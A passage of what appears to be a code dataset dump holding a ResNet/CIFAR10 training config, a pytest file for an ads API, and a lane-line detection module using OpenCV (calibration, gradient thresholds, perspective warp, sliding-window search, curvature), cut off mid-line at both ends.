"call"}, {"api_name": "torch.nn.functional", "line_number": 743, "usage_type": "name"}, {"api_name": "torch.double", "line_number": 748, "usage_type": "attribute"}, {"api_name": "torch.double", "line_number": 749, "usage_type": "attribute"}, {"api_name": "torch.eq", "line_number": 750, "usage_type": "call"}, {"api_name": "torch.double", "line_number": 750, "usage_type": "attribute"}, {"api_name": "torch.double", "line_number": 751, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 752, "usage_type": "call"}, {"api_name": "torch.double", "line_number": 752, "usage_type": "attribute"}, {"api_name": "torch.finfo", "line_number": 755, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 755, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 757, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 758, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 759, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 760, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 761, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 767, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 769, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 770, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 784, "usage_type": "name"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 790, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl", "line_number": 790, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 837, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 838, "usage_type": "attribute"}, {"api_name": "torch.set_num_threads", "line_number": 902, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 905, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 912, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks.EarlyStopping", "line_number": 921, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 956, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 956, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 967, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 967, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 969, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.ExponentialLR", "line_number": 975, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 975, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.CosineAnnealingLR", "line_number": 978, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 978, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 981, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 981, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.ReduceLROnPlateau", "line_number": 984, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 984, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 995, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 995, "usage_type": "name"}]}
+{"seq_id": "270541196", "text": "#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nimport os\nfrom pathlib import Path\n\nBATCH_SIZE = 128\nIMG_SIZE = 224\nNUM_CLS = 1000\n\n# resnet 18\nmodel = dict(\n type='VanillaResNet',\n block_type='ResNetBottleneck',\n layers=[3, 4, 6, 3],\n num_cls=NUM_CLS\n)\n\ntrain_data = dict(\n dataset=dict(\n type='CIFAR10Dataset',\n root=Path(os.environ['DATA']),\n transform_pipeline=[\n dict(type='RandomResizedCrop', size=IMG_SIZE),\n dict(type='RandomHorizontalFlip'),\n dict(type='ToTensor'),\n dict(type='Normalize', mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n ]\n ),\n dataloader=dict(\n batch_size=64,\n pin_memory=True,\n num_workers=4,\n sampler=dict(\n type='DataParallelSampler',\n shuffle=True,\n )\n )\n)\n\ntest_data = dict(\n dataset=dict(\n type='CIFAR10Dataset',\n root=Path(os.environ['DATA']),\n train=False,\n transform_pipeline=[\n dict(type='Resize', size=(IMG_SIZE, IMG_SIZE)),\n dict(type='ToTensor'),\n dict(type='Normalize', mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n ]\n ),\n dataloader=dict(\n batch_size=BATCH_SIZE,\n pin_memory=True,\n num_workers=4,\n )\n)\n\ndist_initializer = [\n dict(type='DataParallelInitializer'),\n]\n\nparallelization = dict(\n pipeline=1,\n tensor=1,\n sequence=-1\n)\n\noptimizer = dict(\n type='Adam',\n lr=0.01\n)\n\nloss = dict(\n type='CrossEntropyLoss'\n)\n\ntrainer = dict(\n max_epochs=5,\n max_iters=1000\n)\n\namp = dict(\n fp16=None,\n)\n\nlevel = 2\n\nparallel = dict(\n pipeline=dict(size=1),\n tensor=dict(size=1, mode=None)\n)\n", "sub_path": "tests/test_zero_data_parallel/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1704, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 21, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}]}
+{"seq_id": "113244271", "text": "__author__ = 'jkf'\n\nimport json\n\nfrom adengine.model import User, Ad, Comment\n\n\ndef build_api_url(id_=None):\n if id_ is not None:\n return \"/api/ads/{}\".format(id_)\n return \"/api/ads\"\n\n\ndef _add_resource(session, resource):\n session.add(resource)\n session.commit()\n return resource\n\n\ndef _new_ad(user, text=\"ad-text\"):\n ad = Ad(text=text, author_id=user.id)\n return ad\n\n\ndef _new_user(name='Peter'):\n user = User(email='{name}@example.com'.format(name=name),\n name=name,\n username=name,\n password_hash='12346')\n return user\n\n\ndef _new_comment(ad, user, text='bla-bla-bla'):\n comment = Comment(text=text,\n ad_id=ad.id,\n author_id=user.id)\n return comment\n\n\ndef test_comments_refers_both_ad_and_user(session, client):\n \"Ensure comments added are referneced from the Ad\"\n # given\n user = _add_resource(session, _new_user(name='PeterGeneralUser'))\n user1 = _add_resource(session, _new_user(name='PeterGeneralUserGrant'))\n ad = _add_resource(session, _new_ad(user, text=\"ad1-text1\"))\n _add_resource(session, _new_comment(ad, user, text=\"ad11-text1\"))\n _add_resource(session, _new_comment(ad, user1, text=\"ad12-text1\"))\n\n # exercise\n result = client.get(build_api_url()).data\n doc = json.loads(result)\n\n # verify\n ads_dicts = doc.get(\"objects\")\n assert 1 == len(ads_dicts), \"Expected only one advertisement.\"\n assert \"ad1-text1\" == ads_dicts[0].get('text')\n", "sub_path": "tests/views/test_ads.py", "file_name": "test_ads.py", "file_ext": "py", "file_size_in_byte": 1519, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "adengine.model.Ad", "line_number": 21, "usage_type": "call"}, {"api_name": "adengine.model.User", "line_number": 26, "usage_type": "call"}, {"api_name": "adengine.model.Comment", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "45264770", "text": "import pickle\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport glob\n\ndef camera_calibrate(cal_images, nx=9, ny=6):\n '''\n camera_calibrate finds camera calibration parameters\n :param cal_images:\n :param nx: number of squares in width of checkerboard\n :param ny: number of square in height of checkerboard\n :return:\n '''\n # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\n objp = np.zeros((nx*ny,3), np.float32)\n objp[:,:2] = np.mgrid[0:nx,0:ny].T.reshape(-1, 2)\n\n # Arrays to store object points and image points from all the images.\n objpoints = [] # 3d points in real world space\n imgpoints = [] # 2d points in image plane.\n\n # Step through the list and search for chessboard corners\n for idx, fname in enumerate(cal_images):\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (nx,ny), None)\n\n # If found, add object points, image points\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n\n return mtx, dist\n\ndef camera_setup(calibration_path='camera_cal/calibration*.jpg', nx=9, ny=6):\n '''\n camera_setup sets up calibration images and returns camera calibration results\n :param calibration_path:\n :param nx: number of squares in width of checkerboard\n :param ny: number of square in height of checkerboard\n :return:\n '''\n # Make a list of calibration images\n cal_images = glob.glob(calibration_path)\n cam_mtx, cam_dist = camera_calibrate(cal_images, nx, ny)\n return cam_mtx, cam_dist\n\ndef cal_undistort(img, mtx, dist):\n '''\n cal_undistort undistorts images\n :param img:\n :param objpoints:\n :param imgpoints:\n :return:\n '''\n # Use cv2.calibrateCamera() and cv2.undistort()\n #gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n #ret, corners = cv2.findChessboardCorners(gray, (8,6), None)\n undist = cv2.undistort(img, mtx, dist, None, mtx)\n #undist = np.copy(img) # Delete this line\n return undist\n\n# Define a function that takes an image, number of x and y points,\n# camera matrix and distortion coefficients\ndef corners_unwarp(img, nx, ny, mtx, dist):\n # Use the OpenCV undistort() function to remove distortion\n undist = cv2.undistort(img, mtx, dist, None, mtx)\n # Convert undistorted image to grayscale\n gray = cv2.cvtColor(undist, cv2.COLOR_BGR2GRAY)\n # Search for corners in the grayscaled image\n ret, corners = cv2.findChessboardCorners(gray, (nx, ny), None)\n\n if ret == True:\n # If we found corners, draw them! (just for fun)\n cv2.drawChessboardCorners(undist, (nx, ny), corners, ret)\n # Choose offset from image corners to plot detected corners\n # This should be chosen to present the result at the proper aspect ratio\n # My choice of 100 pixels is not exact, but close enough for our purpose here\n offset = 100 # offset for dst points\n # Grab the image shape\n img_size = (gray.shape[1], gray.shape[0])\n\n # For source points I'm grabbing the outer four detected corners\n src = np.float32([corners[0], corners[nx-1], corners[-1], corners[-nx]])\n # For destination points, I'm arbitrarily choosing some points to be\n # a nice fit for displaying our warped result\n # again, not exact, but close enough for our purposes\n dst = np.float32([[offset, offset], [img_size[0]-offset, offset],\n [img_size[0]-offset, img_size[1]-offset],\n [offset, img_size[1]-offset]])\n # Given src and dst points, calculate the perspective transform matrix\n M = cv2.getPerspectiveTransform(src, dst)\n # Warp the image using OpenCV warpPerspective()\n warped = cv2.warpPerspective(undist, M, img_size)\n\n # Return the resulting image and matrix\n return warped, M\n\n# Define a function that takes an image, gradient orientation,\n# and threshold min / max values.\ndef abs_sobel_thresh(img, orient='x', thresh_min=0, thresh_max=255, sobel_kernel = 3):\n # Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Apply x or y gradient with the OpenCV Sobel() function\n # and take the absolute value\n if orient == 'x':\n abs_sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel))\n if orient == 'y':\n abs_sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel))\n # Rescale back to 8 bit integer\n scaled_sobel = np.uint8(255*abs_sobel/np.max(abs_sobel))\n # Create a copy and apply the threshold\n binary_output = np.zeros_like(scaled_sobel)\n # Here I'm using inclusive (>=, <=) thresholds, but exclusive is ok too\n binary_output[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1\n\n # Return the result\n return binary_output\n\n# Define a function to return the magnitude of the gradient\n# for a given sobel kernel size and threshold values\ndef mag_thresh(img, sobel_kernel=3, mag_thresh=(0, 255)):\n # Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Take both Sobel x and y gradients\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n # Calculate the gradient magnitude\n gradmag = np.sqrt(sobelx**2 + sobely**2)\n # Rescale to 8 bit\n scale_factor = np.max(gradmag)/255\n gradmag = (gradmag/scale_factor).astype(np.uint8)\n # Create a binary image of ones where threshold is met, zeros otherwise\n binary_output = np.zeros_like(gradmag)\n binary_output[(gradmag >= mag_thresh[0]) & (gradmag <= mag_thresh[1])] = 1\n\n # Return the binary image\n return binary_output\n\n# Define a function to threshold an image for a given range and Sobel kernel\ndef dir_threshold(img, sobel_kernel=3, thresh=(0, np.pi/2)):\n # Grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Calculate the x and y gradients\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n # Take the absolute value of the gradient direction,\n # apply a threshold, and create a binary image result\n absgraddir = np.arctan2(np.absolute(sobely), np.absolute(sobelx))\n binary_output = np.zeros_like(absgraddir)\n binary_output[(absgraddir >= thresh[0]) & (absgraddir <= thresh[1])] = 1\n\n # Return the binary image\n return binary_output\n\ndef color_threshold(img, channel=2, s_thresh=(170, 255)):\n # Convert to HSV color space and separate the V channel\n hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HLS).astype(np.float)\n s_channel = hsv[:, :, channel]\n\n # Threshold color channel\n s_binary = np.zeros_like(s_channel)\n s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1\n\n return s_binary\n\ndef pipeline(img, s_thresh=(170, 255), sx_thresh=(20, 100)):\n img = np.copy(img)\n\n # gradient\n ksize = 3 # Choose a larger odd number to smooth gradient measurements\n gradx = abs_sobel_thresh(img, orient='x', thresh_min=sx_thresh[0], thresh_max=sx_thresh[1], sobel_kernel=ksize)\n grady = abs_sobel_thresh(img, orient='y', thresh_min=sx_thresh[0], thresh_max=sx_thresh[1], sobel_kernel=ksize)\n\n # color\n s_binary = color_threshold(img, 2, s_thresh)\n color_binary = np.dstack((np.zeros_like(gradx), gradx, s_binary))\n\n # mag and dir\n mag_binary = mag_thresh(img, sobel_kernel=ksize, mag_thresh=(0, 255))\n dir_binary = dir_threshold(img, sobel_kernel=ksize, thresh=(0, np.pi / 2))\n\n combined_binary = np.zeros_like(dir_binary)\n combined_binary[(s_binary == 1)|((gradx == 1) & (grady == 1))]=255# | ((mag_binary == 1) & (dir_binary == 1))] = 1\n\n return color_binary, combined_binary\n\ndef window_mask(width, height, img_ref, center, level):\n output = np.zeros_like(img_ref)\n output[int(img_ref.shape[0] - (level + 1) * height):int(img_ref.shape[0] - level * height),\n max(0, int(center - width / 2)):min(int(center + width / 2), img_ref.shape[1])] = 1\n return output\n\ndef find_window_centroids(warped, window_width, window_height, margin):\n window_centroids = [] # Store the (left,right) window centroid positions per level\n window = np.ones(window_width) # Create our window template that we will use for convolutions\n\n # First find the two starting positions for the left and right lane by using np.sum to get the vertical image slice\n # and then np.convolve the vertical image slice with the window template\n\n # Sum quarter bottom of image to get slice, could use a different ratio\n l_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, :int(warped.shape[1] / 2)], axis=0)\n l_center = np.argmax(np.convolve(window, l_sum)) - window_width / 2\n r_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, int(warped.shape[1] / 2):], axis=0)\n r_center = np.argmax(np.convolve(window, r_sum)) - window_width / 2 + int(warped.shape[1] / 2)\n\n # Add what we found for the first layer\n window_centroids.append((l_center, r_center))\n\ndef get_perspective_transform(image, src_in = None, dst_in = None):\n img_size = image.shape\n a = 60\n b = 10\n d = 100\n if src_in is None:\n src_out = np.array([[(img_size[1]/2) - a, (img_size[0]/2) + d],\n [(img_size[1]/6) - b, img_size[0]],\n [(img_size[1]*5/6)+a-b, img_size[0]],\n [(img_size[1]/2)+a+0.5*b, (img_size[0]/2) + d]], np.float32)\n else:\n src_out = src_in\n\n if dst_in is None:\n dst_out = np.array([[(img_size[1]/4), 0],\n [(img_size[1]/4), img_size[0]],\n [(img_size[1]*3/4), img_size[0]],\n [(img_size[1]*3/4), 0]], np.float32)\n\n else:\n dst_out = dst_in\n\n warp_m = cv2.getPerspectiveTransform(src_out, dst_out)\n warp_minv = cv2.getPerspectiveTransform(dst_out, src_out)\n\n return src_out, dst_out, warp_m, warp_minv\n\ndef generate_plot(binary_warped, left_fit, right_fit, line=None):\n # Generate x and y values for plotting\n ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]\n right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]\n\n return left_fitx, right_fitx, ploty\n\n\ndef get_lane_lines(binary_warped):\n # Assuming you have created a warped binary image called \"binary_warped\"\n # Take a histogram of the bottom half of the image\n histogram = np.sum(binary_warped[np.int(binary_warped.shape[0] / 2):, :], axis=0)\n # Create an output image to draw on and visualize the result\n out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255\n # Find the peak of the left and right halves of the histogram\n # These will be the starting point for the left and right lines\n midpoint = np.int(histogram.shape[0] / 2)\n leftx_base = np.argmax(histogram[:midpoint])\n rightx_base = np.argmax(histogram[midpoint:]) + midpoint\n\n # Choose the number of sliding windows\n nwindows = 9\n # Set height of windows\n window_height = np.int(binary_warped.shape[0] / nwindows)\n # Identify the x and y positions of all nonzero pixels in the image\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Current positions to be updated for each window\n leftx_current = leftx_base\n rightx_current = rightx_base\n # Set the width of the windows +/- margin\n margin = 100\n # Set minimum number of pixels found to recenter window\n minpix = 50\n # Create empty lists to receive left and right lane pixel indices\n left_lane_inds = []\n right_lane_inds = []\n\n # Step through the windows one by one\n for window in range(nwindows):\n # Identify window boundaries in x and y (and right and left)\n win_y_low = binary_warped.shape[0] - (window + 1) * window_height\n win_y_high = binary_warped.shape[0] - window * window_height\n win_xleft_low = leftx_current - margin\n win_xleft_high = leftx_current + margin\n win_xright_low = rightx_current - margin\n win_xright_high = rightx_current + margin\n # Draw the windows on the visualization image\n cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)\n cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)\n # Identify the nonzero pixels in x and y within the window\n good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (\n nonzerox < win_xleft_high)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (\n nonzerox < win_xright_high)).nonzero()[0]\n # Append these indices to the lists\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n # If you found > minpix pixels, recenter next window on their mean position\n if len(good_left_inds) > minpix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n if len(good_right_inds) > minpix:\n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n\n # Concatenate the arrays of indices\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n\n # Extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n\n # Fit a second order polynomial to each\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n\n # Generate x and y values for plotting\n left_fitx, right_fitx, ploty = generate_plot(binary_warped, left_fit, right_fit)\n\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n return left_fit, right_fit, left_fitx, right_fitx, ploty, out_img\n\ndef get_lane_lines_with_prior(binary_warped, left_fit, right_fit):\n # Assume you now have a new warped binary image\n # from the next frame of video (also called \"binary_warped\")\n # It's now much easier to find line pixels!\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n margin = 150\n left_lane_inds = ((nonzerox > (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] - margin)) & (\n nonzerox < (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] + margin)))\n right_lane_inds = (\n (nonzerox > (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] - margin)) & (\n nonzerox < (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] + margin)))\n\n # Again, extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n # Fit a second order polynomial to each\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n # Generate x and y values for plotting\n ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]\n right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]\n\n # Create an image to draw on and an image to show the selection window\n out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255\n window_img = np.zeros_like(out_img)\n # Color in left and right line pixels\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n # Generate a polygon to illustrate the search window area\n # And recast the x and y points into usable format for cv2.fillPoly()\n left_line_window1 = np.array([np.transpose(np.vstack([left_fitx - margin, ploty]))])\n left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx + margin, ploty])))])\n left_line_pts = np.hstack((left_line_window1, left_line_window2))\n right_line_window1 = np.array([np.transpose(np.vstack([right_fitx - margin, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx + margin, ploty])))])\n right_line_pts = np.hstack((right_line_window1, right_line_window2))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))\n cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))\n result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n plt.imshow(result)\n plt.plot(left_fitx, ploty, color='yellow')\n plt.plot(right_fitx, ploty, color='yellow')\n plt.xlim(0, 1280)\n plt.ylim(720, 0)\n\n # Create an image to draw on and an image to show the selection window\n out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255\n window_img = np.zeros_like(out_img)\n # Color in left and right line pixels\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n # Generate a polygon to illustrate the search window area\n # And recast the x and y points into usable format for cv2.fillPoly()\n left_line_window1 = np.array([np.transpose(np.vstack([left_fitx - margin, ploty]))])\n left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx + margin, ploty])))])\n left_line_pts = np.hstack((left_line_window1, left_line_window2))\n right_line_window1 = np.array([np.transpose(np.vstack([right_fitx - margin, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx + margin, ploty])))])\n right_line_pts = np.hstack((right_line_window1, right_line_window2))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))\n cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))\n result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n\n return left_fit, right_fit, left_fitx, right_fitx, ploty, result\n\ndef window_mask(width, height, img_ref, center, level):\n output = np.zeros_like(img_ref)\n output[int(img_ref.shape[0] - (level + 1) * height):int(img_ref.shape[0] - level * height),\n max(0, int(center - width / 2)):min(int(center + width / 2), img_ref.shape[1])] = 1\n return output\n\n\ndef find_window_centroids(warped, window_width, window_height, margin):\n window_centroids = [] # Store the (left,right) window centroid positions per level\n window = np.ones(window_width) # Create our window template that we will use for convolutions\n\n # First find the two starting positions for the left and right lane by using np.sum to get the vertical image slice\n # and then np.convolve the vertical image slice with the window template\n\n # Sum quarter bottom of image to get slice, could use a different ratio\n l_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, :int(warped.shape[1] / 2)], axis=0)\n l_center = np.argmax(np.convolve(window, l_sum)) - window_width / 2\n r_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, int(warped.shape[1] / 2):], axis=0)\n r_center = np.argmax(np.convolve(window, r_sum)) - window_width / 2 + int(warped.shape[1] / 2)\n\n # Add what we found for the first layer\n window_centroids.append((l_center, r_center))\n\n # Go through each layer looking for max pixel locations\n for level in range(1, (int)(warped.shape[0] / window_height)):\n # convolve the window into the vertical slice of the image\n image_layer = np.sum(\n warped[int(warped.shape[0] - (level + 1) * window_height):int(warped.shape[0] - level * window_height), :],\n axis=0)\n conv_signal = np.convolve(window, image_layer)\n # Find the best left centroid by using past left center as a reference\n # Use window_width/2 as offset because convolution signal reference is at right side of window, not center of window\n offset = window_width / 2\n l_min_index = int(max(l_center + offset - margin, 0))\n l_max_index = int(min(l_center + offset + margin, warped.shape[1]))\n l_center = np.argmax(conv_signal[l_min_index:l_max_index]) + l_min_index - offset\n # Find the best right centroid by using past right center as a reference\n r_min_index = int(max(r_center + offset - margin, 0))\n r_max_index = int(min(r_center + offset + margin, warped.shape[1]))\n r_center = np.argmax(conv_signal[r_min_index:r_max_index]) + r_min_index - offset\n # Add what we found for that layer\n window_centroids.append((l_center, r_center))\n\n return window_centroids\n\ndef sliding_window_convolution(warped):\n # window settings\n window_width = 50\n window_height = 80 # Break image into 9 vertical layers since image height is 720\n margin = 100 # How much to slide left and right for searching\n\n window_centroids = find_window_centroids(warped, window_width, window_height, margin)\n\n # If we found any window centers\n if len(window_centroids) > 0:\n\n # Points used to draw all the left and right windows\n l_points = np.zeros_like(warped)\n r_points = np.zeros_like(warped)\n\n # Go through each level and draw the windows\n for level in range(0, len(window_centroids)):\n # Window_mask is a function to draw window areas\n l_mask = window_mask(window_width, window_height, warped, window_centroids[level][0], level)\n r_mask = window_mask(window_width, window_height, warped, window_centroids[level][1], level)\n # Add graphic points from window mask here to total pixels found\n l_points[(l_points == 255) | ((l_mask == 1))] = 255\n r_points[(r_points == 255) | ((r_mask == 1))] = 255\n\n # Draw the results\n template = np.array(r_points + l_points, np.uint8) # add both left and right window pixels together\n zero_channel = np.zeros_like(template) # create a zero color channle\n template = np.array(cv2.merge((zero_channel, template, zero_channel)), np.uint8) # make window pixels green\n warpage = np.array(cv2.merge((warped, warped, warped)),\n np.uint8) # making the original road pixels 3 color channels\n output = cv2.addWeighted(warpage, 1, template, 0.5, 0.0) # overlay the orignal road image with window results\n\n # If no window centers found, just display orginal road image\n else:\n output = np.array(cv2.merge((warped, warped, warped)), np.uint8)\n\n return output\n\ndef get_curvature(ploty, left_fit, right_fit, leftx, rightx, xm_per_pix = 3.7 / 700, ym_per_pix= 30 / 720):\n # Define y-value where we want radius of curvature\n # I'll choose the maximum y-value, corresponding to the bottom of the image\n y_eval = np.max(ploty)\n #left_curverad = ((1 + (2 * left_fit[0] * y_eval + left_fit[1]) ** 2) ** 1.5) / np.absolute(2 * left_fit[0])\n #right_curverad = ((1 + (2 * right_fit[0] * y_eval + right_fit[1]) ** 2) ** 1.5) / np.absolute(2 * right_fit[0])\n #print(left_curverad, right_curverad)\n # Example values: 1926.74 1908.48\n\n # Define conversions in x and y from pixels space to meters\n #ym_per_pix = 30 / 720 # meters per pixel in y dimension\n #xm_per_pix = 3.7 / 700 # meters per pixel in x dimension\n\n # Fit new polynomials to x,y in world space\n left_fit_cr = np.polyfit(ploty * ym_per_pix, leftx * xm_per_pix, 2)\n right_fit_cr = np.polyfit(ploty * ym_per_pix, rightx * xm_per_pix, 2)\n # Calculate the new radii of curvature\n left_curverad = ((1 + (2 * left_fit_cr[0] * y_eval * ym_per_pix + left_fit_cr[1]) ** 2) ** 1.5) / np.absolute(\n 2 * left_fit_cr[0])\n right_curverad = ((1 + (2 * right_fit_cr[0] * y_eval * ym_per_pix + right_fit_cr[1]) ** 2) ** 1.5) / np.absolute(\n 2 * right_fit_cr[0])\n\n return left_curverad, right_curverad\n\ndef draw(undist, image, warped, left_fitx, right_fitx, ploty, Minv, left_curverad, right_curverad, line_base_pos, detected, left_curverad_current, right_curverad_current, line_base_pos_current, straightAway=False):\n # Create an image to draw the lines on\n warp_zero = np.zeros_like(warped).astype(np.uint8)\n color_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n\n # Recast the x and y points into usable format for cv2.fillPoly()\n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pts = np.hstack((pts_left, pts_right))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))\n\n # Warp the blank back to original image space using inverse perspective matrix (Minv)\n newwarp = cv2.warpPerspective(color_warp, Minv, (image.shape[1], image.shape[0]))\n # Combine the result with the original image\n result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)\n plt.imshow(result)\n\n # write curvature and position findings\n font = cv2.FONT_HERSHEY_SIMPLEX\n fontColor = (255, 